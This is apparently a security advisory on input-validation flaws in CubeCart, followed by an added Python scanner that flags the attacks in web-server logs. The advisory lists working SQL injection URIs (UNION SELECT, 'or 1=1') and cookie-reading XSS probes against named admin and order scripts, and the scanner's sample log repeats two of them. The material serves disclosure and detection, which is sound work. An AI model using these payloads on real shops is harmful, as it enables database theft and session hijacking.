CubeCart Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a web client. Example URIs have been provided:

http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
http://www.example.com/view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
http://www.example.com/view_doc.php?view_doc=-1'%20union%20select%201,2/*
http://www.example.com/admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
http://www.example.com/admin/print_order.php?order_id=<script>alert(document.cookie);</script>
http://www.example.com/view_order.php?order_id=<script>alert(document.cookie);</script>
http://www.example.com/admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript>
http://www.example.com/admin/nav.php?la_search_home=<script>alert(document.cookie);</script>
http://www.example.com/admin/image.php?image=<script>alert(document.cookie);</script>
http://www.example.com/admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script>
http://www.example.com/admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script>
http://www.example.com/admin/header.inc.php?charset='><script>alert(document.cookie);</script>
http://www.example.com/footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>
http://www.example.com/header.inc.php?site_name=</title><script>alert(document.cookie);</script>

Sample exploit code has been provided:
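For defenders, the scripts and parameters named in the URIs above can be turned into a web-server log check. The following Python is an added example, not part of the original advisory or of the sample exploit code it mentions; the Apache-style log format, the log lines and the names `WATCHED`, `RULES`, `classify` and `scan` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script path -> parameters that appear in the advisory's example URIs.
WATCHED = {
    "/admin/forgot_pass.php": {"user_name"},
    "/view_order.php": {"order_id"},
    "/view_doc.php": {"view_doc"},
    "/admin/print_order.php": {"order_id"},
    "/admin/nav.php": {"site_url", "la_search_home"},
    "/admin/image.php": {"image"},
    "/admin/header.inc.php": {"site_name", "la_adm_header", "charset"},
    "/footer.inc.php": {"la_pow_by"},
    "/header.inc.php": {"site_name"},
}
# Markers seen in those URIs: quote / UNION SELECT / comment opener, and markup characters.
RULES = (
    ("sqli", re.compile(r"'|union\s+select|/\*", re.I)),
    ("xss", re.compile(r'[<>"]')),
)
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # assumed log format

def classify(target):
    """Return sorted (parameter, kind) findings for one request target."""
    url = urlsplit(target)
    # Longest suffix wins: covers subdirectory installs, keeps the two header.inc.php apart.
    hits = [k for k in WATCHED if url.path.endswith(k)]
    params = WATCHED[max(hits, key=len)] if hits else set()
    found = set()
    for name, value in parse_qsl(url.query, keep_blank_values=True):  # percent-decodes
        if name in params:
            found.update((name, kind) for kind, rx in RULES if rx.search(value))
    return sorted(found)

def scan(lines):
    """Return [(line_number, findings)] for log lines that trip a rule."""
    out = []
    for n, line in enumerate(lines, 1):
        m = REQ.search(line)
        findings = classify(m.group(1)) if m else []
        if findings:
            out.append((n, findings))
    return out

SAMPLE_LOG = [  # constructed lines, not captured traffic
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /admin/forgot_pass.php?submit=1&user_name=-1%27or%201=1/* HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /shop/view_order.php?order_id=%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1" 200 930',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /view_order.php?order_id=1042 HTTP/1.1" 200 2210',
]
```

Calling `scan(SAMPLE_LOG)` flags lines 2 and 3 and leaves the ordinary numeric `order_id` request alone; only GET-style query strings are inspected, so POST bodies need a separate source.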